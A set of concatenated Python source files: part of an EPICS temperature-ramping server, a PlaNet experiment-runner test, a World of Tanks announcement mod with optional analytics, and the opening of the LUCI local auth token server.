casmonitor(self.prefix+".KILL",callback=self.monitor)
casmonitor(self.prefix+".P_default",callback=self.monitor)
casmonitor(self.prefix+".I_default",callback=self.monitor)
casmonitor(self.prefix+".D_default",callback=self.monitor)
casmonitor(self.prefix+".oasis_slave",callback=self.monitor)
casmonitor(self.prefix+".temperature_oasis_switch",callback=self.monitor)
casmonitor(self.prefix+".idle_temperature_oasis",callback=self.monitor)
casmonitor(self.prefix+".temperature_oasis_limit_high",callback=self.monitor)
casmonitor(self.prefix+".oasis_headstart_time",callback=self.monitor)
casmonitor(self.prefix+".lightwave_prefix",callback=self.monitor)
casmonitor(self.prefix+".oasis_prefix",callback=self.monitor)
casmonitor(self.prefix+".set_point_update_period",callback=self.monitor)
#############################################################################
## Monitor server-writable PVs that come other servers
## Monitor Timing system IOC
from timing_system import timing_system
camonitor(timing_system.acquiring.PV_name,callback=self.on_acquire)
## Lightwave Temperature controller server
prefix = self.lightwave_prefix
camonitor(prefix+".VAL",callback=self.lightwave_monitor)
camonitor(prefix+".RBV",callback=self.lightwave_monitor)
camonitor(prefix+".P",callback=self.lightwave_monitor)
camonitor(prefix+".I",callback=self.lightwave_monitor)
camonitor(prefix+".DMOV",callback=self.lightwave_monitor)
## Oasis chiller server
prefix = self.oasis_prefix
camonitor(prefix+".VAL",callback=self.oasis_monitor)
camonitor(prefix+".RBV",callback=self.oasis_monitor)
## Create local circular buffers
from circular_buffer_LL import Server
self.buffers = {}
self.buffers['oasis_RBV'] = Server(size = (2,1*3600*2) , var_type = 'float64')
self.buffers['oasis_VAL'] = Server(size = (2,1*3600*2) , var_type = 'float64')
self.buffers['oasis_FAULTS'] = Server(size = (2,1*3600*2) , var_type = 'float64')
self.buffers['lightwave_RBV'] = Server(size = (2,1*3600*2) , var_type = 'float64')
self.buffers['lightwave_P'] = Server(size = (2,1*3600*2) , var_type = 'float64')
self.buffers['lightwave_I'] = Server(size = (2,1*3600*2) , var_type = 'float64')
self.buffers['lightwave_VAL'] = Server(size = (2,1*3600*2) , var_type = 'float64')
def update_once(self):
from CAServer import casput
from numpy import isfinite,isnan,nan
from time import time
from sleep import sleep
pass
def run(self):
"""Run EPICS IOC"""
self.startup()
self.running = True
while self.running:
sleep(1)
self.running = False
def start(self):
"""Run EPCIS IOC in background"""
from threading import Thread
task = Thread(target=self.run,name="temperature_server_IOC.run")
task.daemon = True
task.start()
def shutdown(self):
from CAServer import casdel
print('SHUTDOWN command received')
self.running = False
casdel(self.prefix)
del self
def get_pv_list(self):
from CAServer import PVs
lst = list(PVs.keys())
#lst_new = []
#for item in lst:
# lst_new.append(item.replace(self.prefix,'').replace('.',''))
return lst#lst_new
def monitor(self,PV_name,value,char_value):
"""Process PV change requests"""
from CAServer import casput
from CA import caput
print("monitor: %s = %r" % (PV_name,value))
if PV_name == self.prefix+".VAL_ADV":
if self.get_set_lightwaveT() != value or self.get_set_oasisT() != self.temp_to_oasis(value):
self.set_T(value)
if PV_name == self.prefix+".VAL":
if self.get_set_lightwaveT() != value or self.get_set_oasisT() != self.temp_to_oasis(value):
self.set_adv_T(value)
if PV_name == self.prefix + ".oasis_VAL":
if self.get_set_oasisT() != value:
self.set_set_oasisT(value)
if PV_name == self.prefix + ".TIME_POINTS":
self.time_points = value
if PV_name == self.prefix + ".TEMP_POINTS":
self.temp_points = value
if PV_name == self.prefix + ".KILL":
if value == 'shutdown':
self.shutdown()
if PV_name == self.prefix + ".P_default":
self.P_default = value
self.set_PIDCOF((self.P_default,self.I_default,self.D_default))
if PV_name == self.prefix + ".I_default":
self.I_default = value
self.set_PIDCOF((self.P_default,self.I_default,self.D_default))
if PV_name == self.prefix + ".D_default":
self.D_default = value
self.set_PIDCOF((self.P_default,self.I_default,self.D_default))
if PV_name == self.prefix + ".oasis_slave":
self.oasis_slave = value
if PV_name == self.prefix + ".temperature_oasis_switch":
self.temperature_oasis_switch = value
if PV_name == self.prefix + ".idle_temperature_oasis":
self.idle_temperature_oasis = value
if PV_name == self.prefix + ".temperature_oasis_limit_high":
self.temperature_oasis_limit_high = value
if PV_name == self.prefix + ".oasis_headstart_time":
self.oasis_headstart_time = value
if PV_name == self.prefix + ".lightwave_prefix":
self.lightwave_prefix = value
if PV_name == self.prefix + ".oasis_prefix":
self.oasis_prefix = value
if PV_name == self.prefix + ".set_point_update_period":
self.set_point_update_period = value
def lightwave_monitor(self,PV_name,value,char_value):
#print('time: %r, PV_name = %r,value= %r,char_value = %r' %(time(),PV_name,value,char_value) )
from CA import cainfo
from CAServer import casput
prefix = self.lightwave_prefix
if PV_name == prefix+".VAL":
arr = empty((2,1))
arr[0] = cainfo(prefix+".VAL","timestamp")
arr[1] = float(value)
self.buffers['lightwave_VAL'].append(arr)
casput(self.prefix +'.VAL',value = float(value))
if PV_name == prefix+".RBV":
arr = empty((2,1))
arr[0] = cainfo(prefix+".RBV","timestamp")
arr[1] = float(value)
self.buffers['lightwave_RBV'].append(arr)
casput(self.prefix +'.RBV',value = float(value))
if PV_name == prefix+".P":
arr = empty((2,1))
arr[0] = cainfo(prefix+".P","timestamp")
arr[1] = float(value)
self.buffers['lightwave_P'].append(arr)
casput(self.prefix +'.P',value = float(value))
if PV_name == prefix+".I":
arr = empty((2,1))
arr[0] = cainfo(prefix+".I","timestamp")
arr[1] = float(value)
self.buffers['lightwave_I'].append(arr)
casput(self.prefix +'.I',value = float(value))
#Done Move PV
if PV_name == prefix+".DMOV":
casput(self.prefix +'.DMOV',value = float(value))
def oasis_monitor(self,PV_name,value,char_value):
#print('oasis_monitor: time: %r, PV_name = %r,value= %r,char_value = %r' %(time(),PV_name,value,char_value) )
from CA import cainfo
prefix = self.oasis_prefix
if PV_name == prefix+".VAL":
arr = empty((2,1))
arr[0] = cainfo(prefix+".VAL","timestamp")
arr[1] = float(value)
self.buffers['oasis_VAL'].append(arr)
casput(self.prefix +'.oasis_VAL',value = float(value))
if PV_name == prefix+".RBV":
arr = empty((2,1))
arr[0] = cainfo(prefix+".RBV","timestamp")
arr[1] = float(value)
self.buffers['oasis_RBV'].append(arr)
casput(self.prefix +'.oasis_RBV',value = float(value))
## Temperature trajectory
def on_acquire(self):
"""
starts T-Ramp.
Usually called from monitor()
"""
print('on acquire')
self.ramping = self.acquiring
self.start_ramping()
def start_ramping(self):
"""
starts T-Ramp run_ramping_once method in a separate thread
"""
from thread import start_new_thread
start_new_thread(self.run_ramping_once,())
def run_ramping_once(self):
"""
runs ramping trajectory defined by self.time_points and self.temperaturs
"""
from time_string import date_time
info("Ramp start time: %s" % date_time(self.start_time))
from time import time,sleep
from numpy import where, asarray
if len(self.temperatures) != 0:
max_set_T = max(self.temperatures)
min_set_T = min(self.temperatures)
else:
min_set_T = nan
max_set_T = nan
for (t,T) in zip(self.times,self.temperatures):
dt = self.start_time+t - time()
if dt > 0:
sleep(dt)
current_setT = self.get_setT()
debug('t = %r, T = %r,dt = %r' %(t,T,dt))
self.set_ramp_T(T)
if T == max_set_T or T == min_set_T:
self.set_PIDCOF((self.P_default,self.I_default,self.D_default))
else:
self.set_PIDCOF((self.P_default,0.0,0.0))
#coeffs = asarray([ 4.33863739e-01, -5.45776351e-02, 3.90549564e-04])
#limit = poly.polyval(T, coefs)
# if T > current_setT:
# caput('NIH:LIGHTWAVE.IHLM',limit + 0.2)
# caput('NIH:LIGHTWAVE.ILLM',-4.0)
# else:
# caput('NIH:LIGHTWAVE.IHLM',+4.0)
# caput('NIH:LIGHTWAVE.ILLM',limit - 0.2)
try:
indices = where(self.times >= t+self.oasis_headstart_time)[0][0:1]
debug(indices)
if len(indices) > 0:
idx = indices[0]
self.set_set_oasisT(self.oasis_temperatures[idx])
debug('time = %r, oasis T = %r' %(t,self.temp_to_oasis(self.temperatures[idx])))
except:
error(traceback.format_exc())
if self.ramping_cancelled: break
info("Ramp ended")
self.set_PIDCOF((self.P_default,self.I_default,self.D_default))
self.ramping_cancelled = False
self.ramping = False
# caput('NIH:LIGHTWAVE.IHLM',+4.0)
# caput('NIH:LIGHTWAVE.ILLM',-4.0)
@property
def acquiring(self):
from timing_system import timing_system
return timing_system.acquiring.value
@property
def start_time(self):
from numpy import nan
start_time = nan
from timing_system import timing_system
if timing_system.acquiring.value == 1:
from CA import cainfo
start_time = cainfo(timing_system.acquiring.PV_name,"timestamp")
return start_time
@property
def times(self):
"""
converts self.time_points to an array of values with specified spacing (readT_time_spacing0
"""
from numpy import arange,concatenate
min_dt = self.set_point_update_period
times = [[]]
for i in range(0,len(self.time_points)-1):
T0,T1 = self.time_points[i],self.time_points[i+1]
DT = T1-T0
N = max(int(DT/min_dt),1)
dt = DT/N
T = T0 + arange(0,N)*dt
times.append(T)
if len(self.time_points) > 0:
times.append([self.time_points[-1]])
times = concatenate(times)
return times
@property
def temperatures(self):
temperatures = []
time_points = self.time_points[0:self.N_points]
temp_points = self.temp_points[0:self.N_points]
if len(temp_points) > 1:
from scipy.interpolate import interp1d
f = interp1d(time_points,temp_points, kind='linear',bounds_error=False)
temperatures = f(self.times)
if len(temp_points) == 1:
from numpy import array
temperatures = array(temp_points)
return temperatures
@property
def oasis_temperatures(self):
from numpy import max
if len(self.temperatures) == 0:
t_oasis = []
else:
temp_points = self.temperatures
first_temp = self.temperatures[0]
max_temp = max(temp_points)
t_oasis = []
idx = 0
for temp in temp_points:
oasis_temp = self.temp_to_oasis(temp)
if max_temp >=self.temperature_oasis_switch:
if idx <=1:
t_oasis.append(oasis_temp)
elif idx > 1:
if temp > temp_points[idx-1] and temp_points[idx-1] > temp_points[idx-2]:
t_oasis.append(self.temperature_oasis_limit_high)
elif temp < temp_points[idx-1] and temp_points[idx-1] < temp_points[idx-2]:
t_oasis.append(self.idle_temperature_oasis)
else:
t_oasis.append(t_oasis[idx-2])
else:
t_oasis.append(oasis_temp)
idx +=1
return t_oasis
@property
def oasis_times(self):
time_points = self.times
time_oasis = []
for time in time_points:
time_oasis.append(time - self.oasis_dl.headstart_time)
return time_oasis
@property
def N_points(self):
return min(len(self.time_points),len(self.temp_points))
def get_setT(self):
value = self.buffers['lightwave_VAL'].get_last_N(N = 1)[1,0]
return value
def set_setT(self,value):
debug("set_point = %r" % value)
value = float(value)
if self.get_setT() != value:
self.lightwave_dl.set_cmdT(value)
self.oasis_dl.set_cmdT(self.temp_to_oasis(value))
setT = property(get_setT,set_setT)
def get_lightwaveT(self):
value = self.buffers['lightwave_RBV'].get_last_N(N = 1)[1,0]
return value
lightwaveT = property(get_lightwaveT)
def get_set_lightwaveT(self):
value = self.buffers['lightwave_VAL'].get_last_N(N = 1)[1,0]
return value
def set_set_lightwaveT(self,value):
from CA import caput, cawait
from numpy import isnan
if value is not isnan:
caput(self.lightwave_prefix + '.VAL', value = float(value))
cawait(self.lightwave_prefix + '.VAL')
set_lightwaveT = property(get_set_lightwaveT,set_set_lightwaveT)
def get_oasisT(self):
value = self.buffers['oasis_RBV'].get_last_N(N = 1)[1,0]
return value
oasisT = property(get_oasisT)
def get_set_oasisT(self):
value = self.buffers['oasis_VAL'].get_last_N(N = 1)[1,0]
return value
def set_set_oasisT(self,value):
from CA import caput
from numpy import isnan
if self.get_set_oasisT() != float(value):
if value is not isnan:
caput(self.oasis_prefix+'.VAL', value = float(value))
set_oasisT = property(get_set_oasisT,set_set_oasisT)
def set_T(self,value):
value = float(value)
if value != self.get_set_lightwaveT() or self.temp_to_oasis(value) != self.get_set_oasisT():
if self.oasis_slave:
self.set_set_oasisT(self.temp_to_oasis(value))
self.set_set_lightwaveT(value)
def set_ramp_T(self,value):
value = float(value)
if value != self.get_lightwaveT():
self.set_set_lightwaveT(value)
def set_adv_T(self,value):
value = float(value)
if value != self.get_lightwaveT() or self.temp_to_oasis(value) != self.get_set_oasisT() :
self.set_set_oasisT(self.temp_to_oasis(value))
self.set_PIDCOF((self.P_default,0.0,self.D_default))
self.set_set_lightwaveT(value)
info('set_set_lightwaveT %r at %r' %(value , time()))
info(abs(self.get_lightwaveT() - self.get_set_lightwaveT()))
if value >= self.temperature_oasis_switch:
t_diff = 3.0
else:
t_diff = 3.0
timeout = abs(self.get_lightwaveT() - self.get_set_lightwaveT())*1.5
t1 = time()
while abs(self.get_lightwaveT() - self.get_set_lightwaveT()) > t_diff:
sleep(0.05)
if time() - t1 > timeout:
break
self.set_PIDCOF((self.P_default,self.I_default,self.D_default))
def set_PCOF(self,value):
from CA import caput, cawait
if self.get_PCOF() != value:
caput(self.lightwave_prefix + '.PCOF',value)
cawait(self.lightwave_prefix + '.PCOF')
def get_PCOF(self):
from CA import caget
value = caget(self.lightwave_prefix + '.PCOF')
return value
def set_ICOF(self,value):
from CA import caput, cawait
if self.get_ICOF() != value:
caput(self.lightwave_prefix + '.ICOF',value)
cawait(self.lightwave_prefix + '.ICOF')
def get_ICOF(self):
from CA import caget
value = caget(self.lightwave_prefix + '.ICOF')
return value
def set_DCOF(self,value):
from CA import caput,cawait
if self.get_DCOF() != value:
caput(self.lightwave_prefix + '.DCOF',value)
cawait(self.lightwave_prefix + '.DCOF')
def get_DCOF(self):
from CA import caget
value = caget(self.lightwave_prefix + '.DCOF')
return value
def set_PIDCOF(self,value):
from CA import caput,cawait
if self.get_PIDCOF() != value:
print('setting PIDCOF: %r -> %r' %(self.get_PIDCOF(),value))
caput(self.lightwave_prefix + '.PIDCOF',value)
cawait(self.lightwave_prefix + '.PIDCOF')
def get_PIDCOF(self):
from CA import caget
value = caget(self.lightwave_prefix + '.PIDCOF')
return value
def temp_to_oasis(self,T, mode = 'bistable'):
if mode == 'bistable':
if T >= self.temperature_oasis_switch:
t = self.temperature_oasis_limit_high
else:
t = self.idle_temperature_oasis
else:
oasis_min = t_min= self.idle_temperature_oasis
oasis_max = t_max = self.temperature_oasis_limit_high
T_max= 120.0
T_min= -16
if T <=T_max or T >=T_min:
t = ((T-T_min)/(T_max-T_min))*(t_max-t_min) + t_min
elif T>T_max:
t = self.temperature_oasis_limit_high
elif T<T_min:
t = self.idle_temperature_oasis
if self.oasis_slave:
return round(t,1)
else:
return self.idle_temperature_oasis
temperature_server_IOC = Temperature_Server_IOC()
if __name__ == "__main__":
import logging
logging.basicConfig(level=logging.INFO,
format="%(asctime)s %(levelname)s %(module)s.%(funcName)s: %(message)s",
)
from timing_sequencer import timing_sequencer
print("timing_sequencer.queue_active = %r" % timing_sequencer.queue_active)
print("timing_sequencer.queue_active = False # cancel acquistion")
print("timing_sequencer.queue_active = True # simulate acquistion")
print("timing_sequencer.queue_repeat_count = 0 # restart acquistion")
print("timing_sequencer.queue_active = True # simulate acquistion")
print("self.start_time = time(); self.start_ramping()")
self = temperature_server_IOC
##from matplotlib import pyplot as plt
self.time_points = [0.0,30.0,302.0,332.0,634.0,30.0+634.0,302.0+634.0,332.0+634.0,634.0+634.0]
self.temp_points = [-16,-16,120,120,-16,-16,120,120,-16]
##print("self.lightwave_dl.driver.feedback_loop.PID = (1.0, 0.300000012, 0.561999977)")
##print('plt.plot(self.times,self.temperatures); plt.plot(self.oasis_times,self.oasis_temperatures); plt.show()')
##plt.plot(self.times,self.temperatures); plt.plot(self.oasis_times,self.oasis_temperatures); plt.show()
|
test_running.py
|
# Copyright 2019 The PlaNet Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import pickle
import threading
import time
import numpy as np
import tensorflow as tf
from planet.training import running
class TestExperiment(tf.test.TestCase):
def test_no_kills(self):
tf.logging.set_verbosity(tf.logging.INFO)
basedir = os.path.join(tf.test.get_temp_dir(), 'test_no_kills')
processes = []
for worker_name in range(20):
processes.append(threading.Thread(
target=_worker_normal, args=(basedir, str(worker_name))))
processes[-1].start()
for process in processes:
process.join()
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/DONE'))
self.assertEqual(100, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/PING'))
self.assertEqual(100, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/started'))
self.assertEqual(100, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/resumed'))
self.assertEqual(0, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/failed'))
self.assertEqual(0, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/numbers'))
self.assertEqual(100, len(filepaths))
for filepath in filepaths:
with tf.gfile.GFile(filepath, 'rb') as file_:
self.assertEqual(10, len(pickle.load(file_)))
def test_dying_workers(self):
tf.logging.set_verbosity(tf.logging.INFO)
basedir = os.path.join(tf.test.get_temp_dir(), 'test_dying_workers')
processes = []
for worker_name in range(20):
processes.append(threading.Thread(
target=_worker_dying, args=(basedir, 15, str(worker_name))))
processes[-1].start()
for process in processes:
process.join()
processes = []
for worker_name in range(20):
processes.append(threading.Thread(
target=_worker_normal, args=(basedir, str(worker_name))))
processes[-1].start()
for process in processes:
process.join()
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/DONE'))
self.assertEqual(100, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/PING'))
self.assertEqual(100, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/FAIL'))
self.assertEqual(0, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/started'))
self.assertEqual(100, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/resumed'))
self.assertEqual(20, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/numbers'))
self.assertEqual(100, len(filepaths))
for filepath in filepaths:
with tf.gfile.GFile(filepath, 'rb') as file_:
self.assertEqual(10, len(pickle.load(file_)))
def _worker_normal(basedir, worker_name):
experiment = running.Experiment(
basedir, _process_fn, _start_fn, _resume_fn,
num_runs=100, worker_name=worker_name, ping_every=1.0)
for run in experiment:
for score in run:
pass
def _worker_dying(basedir, die_at_step, worker_name):
experiment = running.Experiment(
basedir, _process_fn, _start_fn, _resume_fn,
num_runs=100, worker_name=worker_name, ping_every=1.0)
step = 0
for run in experiment:
for score in run:
step += 1
if step >= die_at_step:
return
def _start_fn(logdir):
assert not tf.gfile.Exists(os.path.join(logdir, 'DONE'))
assert not tf.gfile.Exists(os.path.join(logdir, 'started'))
assert not tf.gfile.Exists(os.path.join(logdir, 'resumed'))
with tf.gfile.GFile(os.path.join(logdir, 'started'), 'w') as file_:
file_.write('\n')
with tf.gfile.GFile(os.path.join(logdir, 'numbers'), 'wb') as file_:
pickle.dump([], file_)
return []
def _resume_fn(logdir):
assert not tf.gfile.Exists(os.path.join(logdir, 'DONE'))
assert tf.gfile.Exists(os.path.join(logdir, 'started'))
with tf.gfile.GFile(os.path.join(logdir, 'resumed'), 'w') as file_:
file_.write('\n')
with tf.gfile.GFile(os.path.join(logdir, 'numbers'), 'rb') as file_:
numbers = pickle.load(file_)
if len(numbers) != 5:
raise Exception('Expected to be resumed in the middle for this test.')
return numbers
def _process_fn(logdir, numbers):
assert tf.gfile.Exists(os.path.join(logdir, 'started'))
while len(numbers) < 10:
number = np.random.uniform(0, 0.1)
time.sleep(number)
numbers.append(number)
with tf.gfile.GFile(os.path.join(logdir, 'numbers'), 'wb') as file_:
pickle.dump(numbers, file_)
yield number
if __name__ == '__main__':
tf.test.main()
|
mod_modPackInformer.py
|
# -*- coding: utf-8 -*-
import json
import os
import threading
import urllib
import urllib2
import BigWorld
import ResMgr
from gui.Scaleform.daapi.view.dialogs import DIALOG_BUTTON_ID, ConfirmDialogButtons, SimpleDialogMeta
from gui.Scaleform.daapi.view.lobby.LobbyView import LobbyView
from gui import DialogsInterface, SystemMessages, makeHtmlString
from notification.NotificationListView import NotificationListView
from constants import AUTH_REALM
from helpers import getLanguageCode
from adisp import process
from gui.Scaleform.daapi.view.common.BaseTicker import BaseTicker
from helpers import dependency
from skeletons.gui.game_control import IBrowserController, IExternalLinksController
class Config(object):
def __init__(self):
self.data = {
'version' : '',
'name' : '',
'serverMain' : '',
'serverBackup' : '',
'statistic' : False,
'statisticTid' : '',
'openLinkInGameBrowser': False
}
xml = ResMgr.openSection('scripts/client/gui/mods/mod_modPackInformer.xml')
if xml is not None:
self.data['version'] = '%s' % xml.readString('version', '')
self.data['name'] = '%s' % xml.readString('name', '')
self.data['serverMain'] = '%s' % xml.readString('serverMain', '')
self.data['serverBackup'] = '%s' % xml.readString('serverBackup', '')
self.data['statistic'] = xml.readBool('statistic', False)
self.data['statisticTid'] = '%s' % xml.readString('statisticTid', '')
self.data['openLinkInGameBrowser'] = xml.readBool('openLinkInGameBrowser', False)
class Updater(object):
def __init__(self):
self.show = True
self.count = 0
self.lin1 = ''
def start(self):
if not updater.show: return
try:
f = urllib2.urlopen(config.data['serverMain'])
except StandardError:
f = None
if f is None or f.getcode() is not 200:
try:
f = urllib2.urlopen(config.data['serverBackup'])
except StandardError:
f = None
if f is not None and f.getcode() is 200:
mod_text = ''
json_text = json.loads(f.read().decode('utf-8-sig'))
if config.data['version'] != '%s' % json_text['version']:
self.show = False
if json_text['header']:
mod_text += '%s' % json_text['header'].format(**json_text)
if json_text['image']:
try:
image = 'img://gui/html/%s' % json_text['imageName']
path = os.path.realpath(os.path.join('./res/gui/html', '%s' % json_text['imageName']))
if not os.path.exists(path):
urllib.urlretrieve('%s' % json_text['imageLink'], path)
except StandardError:
image = ''
path = ''
if image and path and os.path.exists(path):
mod_text += '<br/><img src=\"%s\" width=\"%s\" height=\"%s\">' % (image, json_text['imageWidth'], json_text['imageHeight'])
if json_text['message']:
mod_text += '<br/>%s' % json_text['message'].format(**json_text)
self.lin1 = '%s' % json_text['link']
DialogsInterface.showDialog(SimpleDialogMeta(json_text['windowName'], mod_text, ConfirmDialogButtons(json_text['buttonNameOpen'], json_text['buttonNameClose']), None), self.click)
link = makeHtmlString('html_templates:lobby/system_messages', 'link', {
'text' : '%s' % json_text['messageLinkName'],
'linkType': '%s' % self.lin1
})
p__msg = '%s<br><br>' % json_text['header'].format(**json_text)
p__msg += '<font color="#E2D2A2" size="15"><b>%s</b></font>' % link
SystemMessages.pushMessage(p__msg, SystemMessages.SM_TYPE.GameGreeting)
def click(self, isConfirmed):
if isConfirmed and self.lin1:
if self.lin1.lower().startswith('http:') or self.lin1.lower().startswith('https:'):
if config.data['openLinkInGameBrowser']:
browser.open(self.lin1)
else:
BigWorld.wg_openWebBrowser(self.lin1)
def openLink(self, action):
if self.lin1 is None or self.lin1 == '': return
if self.lin1 in action:
self.click(True)
class Statistics(object):
def __init__(self):
self.analytics_started = False
self.thread_analytics = None
self.user = None
self.old_user = None
def analytics_start(self):
if not self.analytics_started:
lang = str(getLanguageCode()).upper()
param = urllib.urlencode({
'v' : 1, # Version.
'tid': config.data['statisticTid'],
'cid': self.user, # Anonymous Client ID.
't' : 'screenview', # Screenview hit type.
'an' : 'modPackInformer "%s"' % config.data['name'], # App name.
'av' : 'modPackInformer "%s" %s' % (config.data['name'], config.data['version']),
'cd' : 'Cluster: [%s], lang: [%s]' % (AUTH_REALM, lang), # Screen name / content description.
'ul' : '%s' % lang,
'sc' : 'start'
})
urllib2.urlopen(url='http://www.google-analytics.com/collect?', data=param).read()
self.analytics_started = True
self.old_user = BigWorld.player().databaseID
def start(self):
player = BigWorld.player()
if self.user and self.user != player.databaseID:
self.old_user = player.databaseID
self.thread_analytics = threading.Thread(target=self.end, name='Thread')
self.thread_analytics.start()
self.user = player.databaseID
self.thread_analytics = threading.Thread(target=self.analytics_start, name='Thread')
self.thread_analytics.start()
def end(self):
if self.analytics_started:
lang = str(getLanguageCode()).upper()
param = urllib.urlencode({
'v' : 1, # Version.
'tid': config.data['statisticTid'],
'cid': self.user, # Anonymous Client ID.
't' : 'screenview', # Screenview hit type.
'an' : 'modPackInformer "%s"' % config.data['name'], # App name.
'av' : 'modPackInformer "%s" %s' % (config.data['name'], config.data['version']),
'cd' : 'Cluster: [%s], lang: [%s]' % (AUTH_REALM, lang), # Screen name / content description.
'ul' : '%s' % lang,
'sc' : 'end'
})
urllib2.urlopen(url='http://www.google-analytics.com/collect?', data=param).read()
self.analytics_started = False
class p__Browser(BaseTicker):
externalBrowser = dependency.descriptor(IExternalLinksController)
internalBrowser = dependency.descriptor(IBrowserController)
def __init__(self):
super(p__Browser, self).__init__()
self.__browserID = 'modPackInformer'
return
def _dispose(self):
self.__browserID = 'modPackInformer'
super(p__Browser, self)._dispose()
return
def open(self, link, internal=True):
if internal:
if self.internalBrowser is not None:
self.__showInternalBrowser(link)
else:
self.__showExternalBrowser(link)
else:
self.__showExternalBrowser(link)
return
@process
def __showInternalBrowser(self, link):
self.__browserID = yield self.internalBrowser.load(url=link, browserID=self.__browserID)
def __showExternalBrowser(self, link):
if self.externalBrowser is not None:
self.externalBrowser.open(link)
def hookedGetLabels(self):
return [{
'id' : DIALOG_BUTTON_ID.SUBMIT,
'label' : self._submit,
'focused': True
}, {
'id' : DIALOG_BUTTON_ID.CLOSE,
'label' : self._close,
'focused': False
}]
def hookedLobbyPopulate(self):
hookLobbyPopulate(self)
start = threading.Thread(target=updater.start, name='updater.start')
start.start()
if config.data['statistic']:
stat.start()
def hookedOnClickAction(*args):
updater.openLink(args[3])
hookOnClickAction(*args)
def init():
print '[LOAD_MOD]: [modPackInformer, by spoter]'
def fini():
stat.end()
config = Config()
browser = p__Browser()
updater = Updater()
stat = Statistics()
ConfirmDialogButtons.getLabels = hookedGetLabels
hookLobbyPopulate = LobbyView._populate
LobbyView._populate = hookedLobbyPopulate
hookOnClickAction = NotificationListView.onClickAction
NotificationListView.onClickAction = hookedOnClickAction
|
auth_server.py
|
#!/usr/bin/env python
# Copyright 2016 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
import base64
import collections
import http.server
import json
import logging
import os
import re
import socketserver
import sys
import threading
import time
# Access or ID token with its expiration time.
AccessToken = collections.namedtuple('AccessToken', [
'access_token', # urlsafe str with the token
'expiry', # expiration time as unix timestamp in seconds
])
class TokenError(Exception):
"""Raised by TokenProvider if the token can't be created (fatal error).
See TokenProvider docs for more info.
"""
def __init__(self, code, msg):
super(TokenError, self).__init__(msg)
self.code = code
class RPCError(Exception):
"""Raised by LocalAuthServer RPC handlers to reply with HTTP error status."""
def __init__(self, code, msg):
super(RPCError, self).__init__(msg)
self.code = code
# Account describes one logical account.
Account = collections.namedtuple('Account', ['id', 'email'])
class TokenProvider:
"""Interface for an object that can create OAuth or ID tokens on demand.
Defined as a concrete class only for documentation purposes.
"""
def generate_access_token(self, account_id, scopes):
"""Generates a new access token with given scopes.
Will be called from multiple threads (possibly concurrently) whenever
LocalAuthServer needs to refresh a token with particular scopes.
Can raise RPCError exceptions. They will be immediately converted to
corresponding RPC error replies (e.g. HTTP 500). This is appropriate for
low-level or transient errors.
Can also raise TokenError. It will be converted to an RPC reply with
non-zero error_code. It will also be cached, so that the provider would
never be called again for the same set of scopes. This is appropriate for
high-level fatal errors.
Returns AccessToken on success.
"""
raise NotImplementedError()
def generate_id_token(self, account_id, audience):
"""Generates a new ID token with the given audience.
Behaves similarly to generate_access_token, just produces different sort
of tokens.
"""
raise NotImplementedError()
class LocalAuthServer:
"""LocalAuthServer handles /rpc/LuciLocalAuthService.* requests.
It exposes an HTTP JSON RPC API that is used by task processes to grab an
access token for the service account associated with the task.
It implements RPC handling details and in-memory cache for the tokens, but
defers to the supplied TokenProvider for the actual token generation.
"""
def __init__(self):
self._lock = threading.Lock() # guards everything below
self._accept_thread = None
self._cache = {} # see get_cached_token
self._token_provider = None
self._accounts = frozenset() # set of Account tuples
self._rpc_secret = None
self._server = None
def start(self, token_provider, accounts, default_account_id, port=0):
"""Starts the local auth RPC server on some 127.0.0.1 port.
Args:
token_provider: instance of TokenProvider to use for making tokens.
accounts: a list of Account tuples to allow getting a token for.
default_account_id: goes directly into LUCI_CONTEXT['local_auth'].
port: local TCP port to bind to, or 0 to bind to any available port.
Returns:
A dict to put into 'local_auth' section of LUCI_CONTEXT.
"""
assert all(isinstance(acc, Account) for acc in accounts), accounts
# 'default_account_id' is either not set, or one of the supported accounts.
assert (
not default_account_id or
any(default_account_id == acc.id for acc in accounts))
server = _HTTPServer(self, ('127.0.0.1', port))
# This secret will be placed in a file on disk accessible only to current
# user processes. RPC requests are expected to send this secret verbatim.
# That way we authenticate RPCs as coming from current user's processes.
rpc_secret = base64.b64encode(os.urandom(48)).decode('ascii')
with self._lock:
assert not self._server, 'Already running'
logging.info('Local auth server: http://127.0.0.1:%d', server.server_port)
self._token_provider = token_provider
self._accounts = frozenset(accounts)
self._rpc_secret = rpc_secret
self._server = server
self._accept_thread = threading.Thread(target=self._server.serve_forever)
self._accept_thread.start()
local_auth = {
'rpc_port':
self._server.server_port,
'secret':
self._rpc_secret,
'accounts': [{
'id': acc.id,
'email': acc.email
} for acc in sorted(accounts)],
}
# TODO(vadimsh): Some clients don't understand 'null' value for
# default_account_id, so just omit it completely for now.
if default_account_id:
local_auth['default_account_id'] = default_account_id
return local_auth
def stop(self):
"""Stops the server and resets the state."""
with self._lock:
if not self._server:
return
server, self._server = self._server, None
thread, self._accept_thread = self._accept_thread, None
self._token_provider = None
self._accounts = frozenset()
self._rpc_secret = None
self._cache.clear()
logging.debug('Stopping the local auth server...')
server.shutdown()
thread.join()
server.server_close()
logging.info('The local auth server is stopped')
def handle_rpc(self, method, request):
"""Called by _RequestHandler to handle one RPC call.
Called from internal server thread. May be called even if the server is
